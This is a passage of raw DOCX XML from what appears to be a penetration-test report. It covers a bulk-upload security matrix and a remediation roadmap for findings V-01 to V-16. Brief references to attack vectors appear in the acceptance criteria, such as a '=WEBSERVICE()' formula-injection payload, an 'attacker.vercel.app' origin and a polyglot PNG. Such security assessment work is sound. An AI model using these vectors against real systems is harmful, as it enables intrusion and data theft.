        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace all placeholder values with the actual deployment URLs for each environment before committing. Add a CI/CD pipeline validation step that scans deployment configuration files for placeholder strings and blocks deployment if any are found. Document the exact CORS_ORIGINS value for each environment in the deployment runbook.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="3" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">5.  Bulk Upload Feature - Dedicated Security Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The bulk upload feature received focused security assessment across six attack dimensions. The following matrix summarises the complete security posture of this feature as of this assessment date.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>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5060"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Attack Vector</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Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Malicious File Upload (MIME Confusion)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="140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VULNERABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="506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No magic-byte validation. Client-declared Content-Type and extension only. (V-04)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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CSV Formula Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="140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VULNERABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Cell values not sanitised before database insertion or CSV export. (V-05)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Directory Traversal via Filename</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D35400"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">RISK PRESENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="506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file.filename not sanitised for path traversal sequences. (V-07)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Oversized File / Application DoS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="140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VULNERABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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No file size cap or row count limit enforced at application layer. (V-08)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Unstructured Document Parsing (PDF/DOCX)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:gridSpan w:val="1"/>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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E8449"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">REMEDIATED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="506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PyMuPDF and python-docx libraries removed. CSV/Excel only accepted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Stored XSS via Uploaded Field Values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:gridSpan w:val="1"/>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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E5DA3"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">NOT CONFIRMED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Script tags in test name fields not confirmed rendered without escaping in frontend. Recommend dedicated frontend XSS testing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="FEF5E7" w:val="clear"/>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="180" w:right="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D35400"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">RECOMMENDATION: The bulk upload feature must be disabled or access-restricted until findings V-04, V-05, V-07, and V-08 are fully remediated and verified. The feature in its current state poses an unacceptable risk to platform integrity and availability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">6.  Remediation Roadmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The following schedule prioritises remediation actions by risk level and implementation effort. All Critical and High findings must be resolved and re-verified before any production deployment consideration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5DA3"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1  Immediate Actions (Within 24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700"/>
        <w:gridCol w:w="1680"/>
        <w:gridCol w:w="3280"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Action Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Acceptance Criterion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="70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V-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Rotate ALL compromised account credentials immediately. Purge Git history with git-filter-repo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Platform Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Old passwords invalid. No credentials in Git history.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:gridSpan w:val="1"/>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V-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Remove JWT_SECRET_KEY default from config.py. Add startup validation rejecting weak secrets.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="168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Backend Dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="328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App refuses to start without valid 64-char secret. Change committed to staging.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D35400"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Implement slowapi rate limiting (5/min per IP) on /auth/login and /auth/register endpoints.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend Dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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429 returned after 5 login attempts per minute per IP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5DA3"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2  Short-Term Actions (Within 7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700"/>
        <w:gridCol w:w="1680"/>
        <w:gridCol w:w="3280"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Action Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Acceptance Criterion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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V-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Disable /docs and /openapi.json endpoints when APP_ENV != development.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend Dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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/docs returns 404 on staging and production environments.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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V-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Add python-magic based file signature validation to bulk upload endpoint.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="168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Backend Dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="328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Non-CSV/XLS files rejected with HTTP 400 regardless of extension.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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V-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Implement formula injection sanitisation on bulk upload parsing and CSV export.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend Dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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=WEBSERVICE() payload neutralised in DB and exported CSV output.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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V-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Update exception handler: generic message to clients; full trace logged server-side only.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="168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Backend Dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="328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HTTP 500 returns generic message on staging/production.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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V-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Replace allow_origin_regex CORS with explicit origin allowlist from environment variable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend Dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Requests from attacker.vercel.app rejected with CORS error.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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V-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Remove administrative scripts from public repository; purge complete Git history.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="168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Platform Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="328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Scripts absent from all branches and Git history. Prior URL decommissioned.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5DA3"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">6.3  Medium-Term Actions (Within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700"/>
        <w:gridCol w:w="1680"/>
        <w:gridCol w:w="3280"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Action Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Acceptance Criterion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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V-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Sanitise upload filenames; use server-generated UUIDs for all file system operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend Dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Traversal sequences in filename do not affect server filesystem paths.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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V-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Enforce 5MB file size cap and 1,000-row maximum limit on bulk upload endpoint.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="168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Backend Dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="328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50MB upload returns 413; 2,000-row upload returns 400.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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V-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Deploy SecurityHeadersMiddleware adding all five required security headers to every response.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend Dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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All headers present in API responses; verified via curl.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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V-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Add magic-byte validation and Pillow-based EXIF stripping to logo upload endpoint.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="168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Backend Dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="328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Non-image files rejected; polyglot PNG payload neutralised.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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V-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Migrate JWT storage from localStorage to HttpOnly SameSite=Strict cookies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Full-Stack Dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Tokens inaccessible via document.cookie or localStorage after implementation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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V-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="370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Document and enforce RBAC permission matrix for all roles including Doctor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="168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Backend Dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="328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Doctor role cannot access admin-only endpoints; verified via test suite.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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V-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Replace render.yaml placeholder URLs with actual deployment origins.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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DevOps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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No placeholder strings present in deployment configuration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">7.  DevSecOps &amp; SDLC Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
